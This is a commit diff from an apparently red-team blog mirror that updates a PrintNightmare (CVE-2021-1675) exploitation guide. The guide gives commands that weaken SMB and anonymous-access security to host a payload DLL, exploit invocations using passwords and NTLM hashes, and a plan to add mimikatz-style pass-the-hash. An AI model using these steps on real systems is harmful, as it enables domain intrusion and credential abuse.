qwqdanchun
/
qwqdanchun.github.io
mirror of https://github.com/qwqdanchun/qwqdanchun.github.io.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Deploying to gh-pages from @ 4b6df0cb1e 🚀

This commit is contained in:
qwqdanchun 2022-11-20 10:44:59 +00:00
parent a925bd3d94
commit b0e5172c4c
5 changed files with 73 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
PrintNightmare/index.html
View File

@ -24,7 +24,7 @@
<meta property="og:description" content="概述CVE-2021-1675 &#x2F; CVE-2021-34527 这两个洞本质上就是一个洞只是因为修复的问题分配了两个编号。具体的漏洞分析就不赘述了很早就有人发过没必要炒冷饭这里只总结下实际使用时可能出现的问题以及很多poc中不会提到的细节 复现攻击环境注意事项1.域相关目标机器为域内Windows Server机器时攻击机必须为同一域内的机器目标机器为非域环境Window">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-11-12T19:34:50.000Z">
<meta property="article:modified_time" content="2022-11-17T14:45:30.497Z">
<meta property="article:modified_time" content="2022-11-20T10:44:41.639Z">
<meta property="article:author" content="qwqdanchun">
<meta property="article:tag" content="漏洞复现">
<meta property="article:tag" content="PrintNightmare">
@ -242,7 +242,7 @@
<span class="post-meta mr-2">
<i class="iconfont icon-chart"></i>
3.7k 字
4.6k 字
</span>
@ -253,7 +253,7 @@
31 分钟
39 分钟
</span>
@ -356,7 +356,7 @@
<p class="note note-info">
本文最后更新于2022年11月17日 晚上
本文最后更新于2022年11月20日 晚上
</p>
@ -365,11 +365,11 @@
<div class="markdown-body">
<h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a><strong>概述</strong></h1><p><strong>CVE-2021-1675 &#x2F; CVE-2021-34527 这两个洞本质上就是一个洞只是因为修复的问题分配了两个编号。具体的漏洞分析就不赘述了很早就有人发过没必要炒冷饭这里只总结下实际使用时可能出现的问题以及很多poc中不会提到的细节</strong></p>
<h2 id="复现攻击环境"><a href="#复现攻击环境" class="headerlink" title="复现攻击环境"></a>复现攻击环境</h2><h3 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h3><h4 id="1-域相关"><a href="#1-域相关" class="headerlink" title="1.域相关"></a>1.域相关</h4><p>目标机器为域内Windows Server机器时攻击机必须为同一域内的机器目标机器为非域环境Windows Server机器时攻击机器为目标机器可以访问到的另一机器即可</p>
<h1 id="复现攻击环境"><a href="#复现攻击环境" class="headerlink" title="复现攻击环境"></a>复现攻击环境</h1><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><h3 id="1-域相关"><a href="#1-域相关" class="headerlink" title="1.域相关"></a>1.域相关</h3><p>目标机器为域内Windows Server机器时攻击机必须为同一域内的机器目标机器为非域环境Windows Server机器时攻击机器为目标机器可以访问到的另一机器即可</p>
<blockquote>
<p>加入域后的Windows系统访问外部资源会携带已登录的域用户凭证所以未加入域且未提前指定凭据的的SMB就无法访问。因此攻击域内机器有此限制</p>
</blockquote>
<h4 id="2-SMBv1"><a href="#2-SMBv1" class="headerlink" title="2.SMBv1"></a>2.SMBv1</h4><p>攻击机器为Windows Server 2019及更高版本时需要执行 <code>Enable-WindowsOptionalFeature -Online -FeatureName smb1protocol</code>并重启去开启SMBv1否则有可能出现rpc_s_access_denied的问题攻击机器为2016及更低版本的系统时可以直接使用 <code>Set-SmbServerConfiguration -EnableSMB1Protocol $true</code>开启SMBv1的支持</p>
<h3 id="2-SMBv1"><a href="#2-SMBv1" class="headerlink" title="2.SMBv1"></a>2.SMBv1</h3><p>攻击机器为Windows Server 2019及更高版本时需要执行 <code>Enable-WindowsOptionalFeature -Online -FeatureName smb1protocol</code>并重启去开启SMBv1否则有可能出现rpc_s_access_denied的问题攻击机器为2016及更低版本的系统时可以直接使用 <code>Set-SmbServerConfiguration -EnableSMB1Protocol $true</code>开启SMBv1的支持</p>
<h2 id="步骤"><a href="#步骤" class="headerlink" title="步骤"></a>步骤</h2><h3 id="1-准备payload"><a href="#1-准备payload" class="headerlink" title="1.准备payload"></a>1.准备payload</h3><p>在攻击机器创建C:\share文件夹并将dll放入其中此路径可根据需求修改修改后下一步脚本自行对应修改</p>
<h3 id="2-开启SMB匿名共享"><a href="#2-开启SMB匿名共享" class="headerlink" title="2.开启SMB匿名共享"></a>2.开启SMB匿名共享</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><br><span class="hljs-comment">#修改路径权限,使所有人可读</span><br>icacls C:\share\ /T /grant Anonymous` logon:F<br>icacls C:\share\ /T /grant Everyone:F<br><span class="hljs-comment">#创建名称为share路径为C:\share的SMB共享</span><br><span class="hljs-built_in">New-SmbShare</span> <span class="hljs-literal">-Path</span> C:\share <span class="hljs-literal">-Name</span> share <span class="hljs-literal">-FullAccess</span> <span class="hljs-string">&#x27;ANONYMOUS LOGON&#x27;</span>,<span class="hljs-string">&#x27;Everyone&#x27;</span><br><span class="hljs-comment">#启用guest用户</span><br>net user guest /active:yes<br><span class="hljs-comment">#覆盖已有的NullSessionPipes配置</span><br>REG ADD <span class="hljs-string">&quot;HKLM\System\CurrentControlSet\Services\LanManServer\Parameters&quot;</span> /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f<br><span class="hljs-comment">#设置可以匿名访问共享</span><br>REG ADD <span class="hljs-string">&quot;HKLM\System\CurrentControlSet\Services\LanManServer\Parameters&quot;</span> /v NullSessionShares /t REG_MULTI_SZ /d share /f<br><span class="hljs-comment">#设置Everyone权限包含匿名登录用户</span><br>REG ADD <span class="hljs-string">&quot;HKLM\System\CurrentControlSet\Control\Lsa&quot;</span> /v EveryoneIncludesAnonymous /t REG_DWORD /d <span class="hljs-number">1</span> /f<br><span class="hljs-comment">#设置任何用户都可以通过网络获取本机的信息</span><br>REG ADD <span class="hljs-string">&quot;HKLM\System\CurrentControlSet\Control\Lsa&quot;</span> /v RestrictAnonymous /t REG_DWORD /d <span class="hljs-number">0</span> /f<br><span class="hljs-comment">#提取本地安全组策略</span><br>secedit /export /cfg gp.inf /quiet<br><span class="hljs-comment">#修改组策略中的指定权限</span><br>(<span class="hljs-built_in">Get-Content</span> gp.inf) <span class="hljs-operator">-replace</span> <span class="hljs-string">&quot;SeDenyNetworkLogonRight = Guest&quot;</span>,<span class="hljs-string">&quot;SeDenyNetworkLogonRight = &quot;</span> | <span class="hljs-built_in">Set-Content</span> <span class="hljs-string">&quot;gp.inf&quot;</span><br><span class="hljs-comment">#导入本地安全组策略</span><br>secedit /configure /db gp.sdb /cfg gp.inf /quiet<br><span class="hljs-comment">#更新本地安全组策略</span><br>CMD.EXE /C <span class="hljs-string">&quot;gpupdate/force&quot;</span><br><span class="hljs-comment">#清理文件</span><br>CMD.EXE /C <span class="hljs-string">&quot;del gp.inf&quot;</span><br>CMD.EXE /C <span class="hljs-string">&quot;del gp.sdb&quot;</span><br></code></pre></td></tr></table></figure>
@ -386,6 +386,24 @@
<h3 id="4-执行"><a href="#4-执行" class="headerlink" title="4.执行"></a>4.执行</h3><p>示例:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs bash">CVE-2021-1675.exe hackit.local/domain_user:Pass123@192.168.1.10 <span class="hljs-string">&quot;\\192.168.1.215\share\addCube.dll&quot;</span><br><br>CVE-2021-1675.exe hackit.local/domain_user:Pass123@192.168.1.10 <span class="hljs-string">&quot;\\192.168.1.215\share\addCube.dll&quot;</span> <span class="hljs-string">&quot;C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL&quot;</span><br><br>CVE-2021-1675.exe hackit.local/domain_user@192.168.1.10 -hashes :f0cff78ea8d2d87e5d1caccf01d0bd2f <span class="hljs-string">&quot;\\192.168.1.215\share\addCube.dll&quot;</span><br><br>CVE-2021-1675.exe hackit.local/domain_user@192.168.1.10 -hashes :f0cff78ea8d2d87e5d1caccf01d0bd2f <span class="hljs-string">&quot;\\192.168.1.215\share\addCube.dll&quot;</span> <span class="hljs-string">&quot;C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL&quot;</span><br><br>CVE-2021-1675.exe domain_user:Pass123@192.168.1.10 <span class="hljs-string">&quot;\\192.168.1.215\share\addCube.dll&quot;</span><br><br>CVE-2021-1675.exe domain_user:Pass123@192.168.1.10 <span class="hljs-string">&quot;\\192.168.1.215\share\addCube.dll&quot;</span> <span class="hljs-string">&quot;C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL&quot;</span><br><br>CVE-2021-1675.exe domain_user@192.168.1.10 -hashes :f0cff78ea8d2d87e5d1caccf01d0bd2f <span class="hljs-string">&quot;\\192.168.1.215\share\addCube.dll&quot;</span><br><br>CVE-2021-1675.exe domain_user@192.168.1.10 -hashes :f0cff78ea8d2d87e5d1caccf01d0bd2f <span class="hljs-string">&quot;\\192.168.1.215\share\addCube.dll&quot;</span> <span class="hljs-string">&quot;C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL&quot;</span><br></code></pre></td></tr></table></figure>
<h1 id="武器化思路"><a href="#武器化思路" class="headerlink" title="武器化思路"></a>武器化思路</h1><p>按照上文的方法已经足够应付大多数攻击场景了但是如果从武器化开发的角度来看pyinstaller这东西还是太不优雅了所以我们回头看向了另一份poc<a target="_blank" rel="noopener" href="https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare">SharpPrintNightmare</a>对这份代码稍作修改即可实现使用hash验证身份的功能</p>
<h2 id="1-背景介绍"><a href="#1-背景介绍" class="headerlink" title="1.背景介绍"></a>1.背景介绍</h2><p>Pass The Hash这项技术实现起来有两种思路一种是自己构造包然后发包完成验证另一种是修改自己进程或线程内存中保存的身份验证信息并修改。</p>
<h2 id="2-确定思路"><a href="#2-确定思路" class="headerlink" title="2.确定思路"></a>2.确定思路</h2><p>为了方便开发这里选用第二种方法。毕竟去翻RPC和SMB的文档是一个很让人头疼的事……</p>
<p>而第二种方法的典型案例就是mimikatz所以首先使用mimikatz进行简单的测试</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs text">sekurlsa::pth /user:John /domain:192.168.0.111 /ntlm:f0cff78ea8d2d87e5d1caccf01d0bd2f /run:&quot;SharpPrintNightmare.exe&quot;<br><br>为了方便测试此处我已经修改SharpPrintNightmare代码并写死了参数<br></code></pre></td></tr></table></figure>
<p>可以发现思路可行确定了patch的方案</p>
<p>mimikatz有一个C#的版本<a target="_blank" rel="noopener" href="https://github.com/b4rtik/SharpKatz">SharpKatz</a><del>抄袭</del>参考其中pth功能的实现代码即可</p>
<p>SharpKatz中的此部分代码基本完全由mimikatz的代码翻译而成建议先看其中任意一个的代码了解下原理。</p>
<p>总结后需要对SharpPrintNightmare进行的修改为</p>
<ul>
<li>添加pth选项进行参数判断</li>
<li>修改原项目的Impersonator类如果使用pth就不再执行LogonUser函数改为使用SharpKatz中的pth模块的<a target="_blank" rel="noopener" href="https://github.com/b4rtik/SharpKatz/blob/87e8e6661999d19bbcae3c0623f78dc2a1a9b45f/SharpKatz/Module/Pth.cs#L34">CreateProcess</a>函数此处需要将SharpKatz的对应代码集成进来注意将impersonate设置为true以便使用当前线程去连接而不是使用新进程方便内存加载</li>
<li><a target="_blank" rel="noopener" href="https://github.com/b4rtik/SharpKatz">SharpKatz</a>的pth中所需的内存查找的特征不全需要参考mimikatz中的补全</li>
</ul>
<p>确定了以上修改方案,再完善一下使用细节,以及对应的文本提示与错误反馈即可完成工具的武器化</p>
<h2 id="3-成果"><a href="#3-成果" class="headerlink" title="3.成果"></a>3.成果</h2><p>因为各种原因,就不放成品了,有兴趣的可以自己按照步骤修改一遍啦</p>
</div>
@ -457,7 +475,7 @@
<div class="license-meta-item license-meta-date">
<div>更新于</div>
<div>2022年11月17</div>
<div>2022年11月20</div>
</div>

4
about/index.html
View File

@ -23,8 +23,8 @@
<meta property="og:site_name" content="簞純&#39;s Blog">
<meta property="og:description" content="这里是簞純一个单纯的日常生产bug再debug的菜鸡红队安全开发目前主要做Windows下的二进制方向开发 ID簞純 &#x2F; qwqdanchun Tag伪技术宅干饭人老二次元佛系咕咕咕夜猫子 QQ聊天群814084837">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-11-17T14:45:30.497Z">
<meta property="article:modified_time" content="2022-11-17T14:45:30.497Z">
<meta property="article:published_time" content="2022-11-20T10:44:41.639Z">
<meta property="article:modified_time" content="2022-11-20T10:44:41.639Z">
<meta property="article:author" content="qwqdanchun">
<meta name="twitter:card" content="summary_large_image">

84
categories/index.html
View File

@ -236,48 +236,6 @@
<div class="category row nomargin-x">
<a class="category-item collapsed
list-group-item category-item-action col-10 col-md-11 col-xm-11" title="生活"
id="heading-aefcbfca08c840aeb8bd72dc1c8ff7f9" role="tab" data-toggle="collapse" href="#collapse-aefcbfca08c840aeb8bd72dc1c8ff7f9"
aria-expanded="false"
>
生活
<span class="list-group-count"></span>
<i class="iconfont icon-arrowright"></i>
</a>
<a href="/categories/%E7%94%9F%E6%B4%BB/" class="category-count col-2 col-md-1 col-xm-1">
<i class="iconfont icon-articles"></i>
<span>1</span>
</a>
<div class="category-collapse collapse " id="collapse-aefcbfca08c840aeb8bd72dc1c8ff7f9"
role="tabpanel" aria-labelledby="heading-aefcbfca08c840aeb8bd72dc1c8ff7f9">
<div class="category-post-list">
<a href="/hello-world/" title="Hello World Again"
class="list-group-item list-group-item-action
">
<span class="category-post">Hello World Again</span>
</a>
</div>
</div>
</div>
<div class="category row nomargin-x">
<a class="category-item collapsed
list-group-item category-item-action col-10 col-md-11 col-xm-11" title="漏洞"
@ -317,6 +275,48 @@
</div>
</div>
<div class="category row nomargin-x">
<a class="category-item collapsed
list-group-item category-item-action col-10 col-md-11 col-xm-11" title="生活"
id="heading-aefcbfca08c840aeb8bd72dc1c8ff7f9" role="tab" data-toggle="collapse" href="#collapse-aefcbfca08c840aeb8bd72dc1c8ff7f9"
aria-expanded="false"
>
生活
<span class="list-group-count"></span>
<i class="iconfont icon-arrowright"></i>
</a>
<a href="/categories/%E7%94%9F%E6%B4%BB/" class="category-count col-2 col-md-1 col-xm-1">
<i class="iconfont icon-articles"></i>
<span>1</span>
</a>
<div class="category-collapse collapse " id="collapse-aefcbfca08c840aeb8bd72dc1c8ff7f9"
role="tabpanel" aria-labelledby="heading-aefcbfca08c840aeb8bd72dc1c8ff7f9">
<div class="category-post-list">
<a href="/hello-world/" title="Hello World Again"
class="list-group-item list-group-item-action
">
<span class="category-post">Hello World Again</span>
</a>
</div>
</div>
</div>
</div>

6
hello-world/index.html
View File

@ -24,7 +24,7 @@
<meta property="og:description" content="历时半个多月删站的我又决定把博客搭起来了这次从用了五年的Wordpress换成了Hexo自动部署的纯静态博客似乎也是不错的 不过之前的文章没有保存了,很多都是早年写的东西,现在看来已经没有意义了 后面会尽量恢复记笔记的习惯,也就顺手更一些文章吧,希望我的文章可以帮到你">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-11-11T11:15:50.000Z">
<meta property="article:modified_time" content="2022-11-17T14:45:30.497Z">
<meta property="article:modified_time" content="2022-11-20T10:44:41.639Z">
<meta property="article:author" content="qwqdanchun">
<meta name="twitter:card" content="summary_large_image">
@ -351,7 +351,7 @@
<p class="note note-info">
本文最后更新于2022年11月17日 晚上
本文最后更新于2022年11月20日 晚上
</p>
@ -419,7 +419,7 @@
<div class="license-meta-item license-meta-date">
<div>更新于</div>
<div>2022年11月17</div>
<div>2022年11月20</div>
</div>

2
local-search.xml
View File

File diff suppressed because one or more lines are too long